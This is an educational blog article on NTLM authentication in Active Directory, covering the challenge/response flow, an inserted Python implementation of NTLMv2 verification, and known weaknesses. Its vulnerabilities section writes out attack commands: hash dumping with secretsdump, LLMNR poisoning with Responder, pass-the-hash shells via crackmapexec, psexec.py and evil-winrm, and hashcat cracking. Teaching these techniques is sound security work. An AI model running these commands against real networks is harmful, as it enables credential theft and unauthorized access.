NTLM Authentication in Active Directory

Hacktivities · Published in InfoSec Write-ups · Jun 12, 2022

This article provides a basic overview of how New Technology LAN Manager (NTLM) authentication works. We will explore the basic functionality of NTLM authentication and how it is used in Active Directory. NTLM authentication is a large topic and this article only covers the fundamentals, so with that being said, let's dive in!

What is NTLM?

In my last article titled “Kerberos Authentication in Active Directory”, I mentioned that the other main type of authentication in place for Active Directory was NTLM. Microsoft describes NTLM as follows:

The NTLM authentication protocols authenticate users and computers based on a challenge/response mechanism that proves to a server or domain controller that a user knows the password associated with an account.

NTLM is a single sign-on (SSO) mechanism that relies on a challenge-response protocol to verify the user with a password hash, avoiding the need to send unprotected passwords over the network. While NTLM is still supported by Microsoft, it is an outdated protocol which was replaced by Kerberos as the default authentication protocol in Windows 2000 and subsequent Active Directory (AD) domains.

Why is NTLM Still Used?

Despite being replaced by Kerberos as the default authentication protocol and having multiple vulnerabilities, NTLM is still maintained on all Windows systems. This is mainly due to the following reasons:

  • Compatibility purposes between older clients and servers.
  • NTLM authentication is still supported and must be used for Windows authentication with systems configured as a member of a workgroup.
  • NTLM authentication is used for local logon authentication on non-domain controllers.

How does NTLM Authentication work in an AD Environment?

NTLM authentication allows the application server to act as an intermediary between the client and AD. All authentication material is forwarded to a Domain Controller in the form of a challenge, and if the challenge is completed successfully, the application server authenticates the user. NTLM authenticates users through a challenge-response mechanism. This process consists of three messages:

  1. Negotiation message from the client
  2. Challenge message from the server
  3. Authentication message from the client

NTLM authentication follows the following step-by-step process:

  1. The user shares their username, password and domain name with the client.
  2. The client derives a scrambled version of the password (a hash) and discards the full password.
  3. The client passes a plain text version of the username to the relevant application server.
  4. The application server replies to the client with a challenge, which is a 16-byte random number.
  5. In response, the client sends the challenge encrypted with the hash of the user's password.
  6. The application server then sends the challenge, response and username to the domain controller (DC).
  7. The DC retrieves the user's password from its database and uses it to encrypt the challenge.
  8. The DC then compares its encrypted challenge with the client's response. If the two match, the user is authenticated and access is granted.

The sequence diagram below illustrates the steps outlined above.

[Figure: NTLM authentication sequence diagram example.]

NTLM Security Vulnerabilities

NTLM is an outdated protocol with multiple security weaknesses that attackers can exploit. A few examples of security vulnerabilities related to NTLM are given below.

Pass-The-Hash Attack

A pass-the-hash attack is a technique whereby an attacker captures a password hash (as opposed to the password characters) and then simply passes it through for authentication and, potentially, lateral access to other networked systems. NTLM hashes can be obtained with tools like "secretsdump.py" from Impacket to dump hashes on a compromised machine.

sudo python3 secretsdump.py domain/user:password@192.168.57.141
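The challenge/response computation from the eight steps above, and the reason a captured NT hash on its own is enough for pass-the-hash, as an added Python example (not code from the original article, nor from Impacket or Responder). It models NTLMv2 as specified in MS-NLMP: the client derives the NT hash (MD4 of the UTF-16LE password), keys HMAC-MD5 with it, and answers the server challenge; the DC verifies the answer using only the stored NT hash. A pure-Python MD4 is included because hashlib frequently lacks MD4 on OpenSSL 3 builds. The user john, the domain CORP, the password and the function names are this example's own constructed values, not values from the article.

```python
# Added example (not from the article): NTLMv2 challenge/response per MS-NLMP.
# Shows the client side (derive a proof from the NT hash) and the DC side (verify
# with only the stored NT hash). The cleartext password is never needed after the
# hash exists, which is exactly the property pass-the-hash abuses.
import hmac
import hashlib
import os
import struct

MASK32 = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK32


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib's MD4 is often unavailable on OpenSSL 3."""
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)          # pad to 56 mod 64
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)  # bit length, LE
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    r2 = (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)
    r3 = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    for off in range(0, len(msg), 64):
        w = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):                                # round 1
            a = _rotl((a + f(b, c, d) + w[i]) & MASK32, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i, k in enumerate(r2):                         # round 2
            a = _rotl((a + g(b, c, d) + w[k] + 0x5A827999) & MASK32, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i, k in enumerate(r3):                         # round 3
            a = _rotl((a + h(b, c, d) + w[k] + 0x6ED9EBA1) & MASK32, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a, b, c, d = (a + aa) & MASK32, (b + bb) & MASK32, (c + cc) & MASK32, (d + dd) & MASK32
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    """Step 2: the client keeps MD4(UTF-16LE(password)) and discards the password."""
    return md4(password.encode("utf-16le"))


def ntowf_v2(nthash: bytes, user: str, domain: str) -> bytes:
    """NTLMv2 key: HMAC-MD5 keyed by the NT hash over UPPER(user) + domain (MS-NLMP 3.3.2)."""
    return hmac.new(nthash, (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()


def build_blob(client_challenge: bytes, timestamp: bytes, target_info: bytes) -> bytes:
    """The 'temp' structure that is hashed together with the server challenge.
    target_info is the AV_PAIR list and must end with the MsvAvEOL terminator."""
    return (b"\x01\x01" + b"\x00" * 6 + timestamp + client_challenge
            + b"\x00" * 4 + target_info + b"\x00" * 4)


def client_response(nthash: bytes, user: str, domain: str,
                    server_challenge: bytes, blob: bytes) -> bytes:
    """Step 5: NTProofStr = HMAC-MD5(NTOWFv2, ServerChallenge || blob). Needs only the hash."""
    return hmac.new(ntowf_v2(nthash, user, domain), server_challenge + blob, hashlib.md5).digest()


def dc_verify(stored_nthash: bytes, user: str, domain: str,
              server_challenge: bytes, blob: bytes, nt_proof: bytes) -> bool:
    """Steps 7-8: the DC recomputes the proof from its stored hash and compares."""
    expected = client_response(stored_nthash, user, domain, server_challenge, blob)
    return hmac.compare_digest(expected, nt_proof)


def demo_exchange(password: str = "password", user: str = "john", domain: str = "CORP") -> dict:
    """One NTLMv2 exchange with constructed sample values (user/domain/password are made up)."""
    nthash = nt_hash(password)                  # held by the client and, in AD, by the DC
    server_challenge = os.urandom(8)            # step 4: random challenge from the server
    target_info = b"\x02\x00\x08\x00" + domain.encode("utf-16le") + b"\x00" * 4  # NbDomain + EOL
    blob = build_blob(os.urandom(8), b"\x00" * 8, target_info)   # client nonce, zero timestamp
    proof = client_response(nthash, user, domain, server_challenge, blob)
    return {
        "nthash": nthash.hex(),
        "accepted": dc_verify(nthash, user, domain, server_challenge, blob, proof),
        "wrong_password_rejected": not dc_verify(nt_hash("Password"), user, domain,
                                                 server_challenge, blob, proof),
        # a fresh challenge must not be satisfied by replaying the old proof
        "replay_rejected": not dc_verify(nthash, user, domain, os.urandom(8), blob, proof),
    }


if __name__ == "__main__":
    print(demo_exchange())
```

Note that client_response() takes the NT hash, never the password: whoever holds the hash (a dumped SAM or NTDS entry, a captured LSASS secret) can produce a valid proof for any challenge, which is all a pass-the-hash tool such as psexec.py -hashes does. On the defensive side, the same computation shows why the DC must tie the proof to a fresh server challenge (replay_rejected) and why NTLM should be restricted or audited where Kerberos is available.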

LLMNR Poisoning can also be performed with Responder to capture hashes.

python3 Responder.py -I tun0 -rdwv
[Figure: NTLMv2 hash captured by Responder.]

There are multiple tools that can then be used to perform a pass the hash attack, including Evil-WinRM, crackmapexec, and psexec.py.

# -H : hash
crackmapexec smb 10.0.3.0/24 -u "John" -H <hash> --local-auth
# Can use psexec to create shell using a hash
psexec.py "John":@192.168.57.141 -hashes <hash>
# alternative tool for pass the hash attack
evil-winrm -u Administrator -H <hash> -i 10.10.25.158

Outdated Cryptography

NTLM uses outdated cryptography and does not benefit from modern advances in password hashing or encryption that make stored credentials harder to recover. Tools such as hashcat can crack captured NTLMv2 hashes and recover user passwords with ease.

hashcat64.exe -m 5600 hash.txt rockyou.txt
[Figure: cracked NTLMv2 hash.]

Closing Remarks

Hopefully this short article on NTLM authentication has provided a basic overview of what it is and how it works. Despite being replaced by Kerberos, NTLM authentication is still widely used by the majority of large companies that run Active Directory. Thank you for reading to the end and keep hacking! 😄
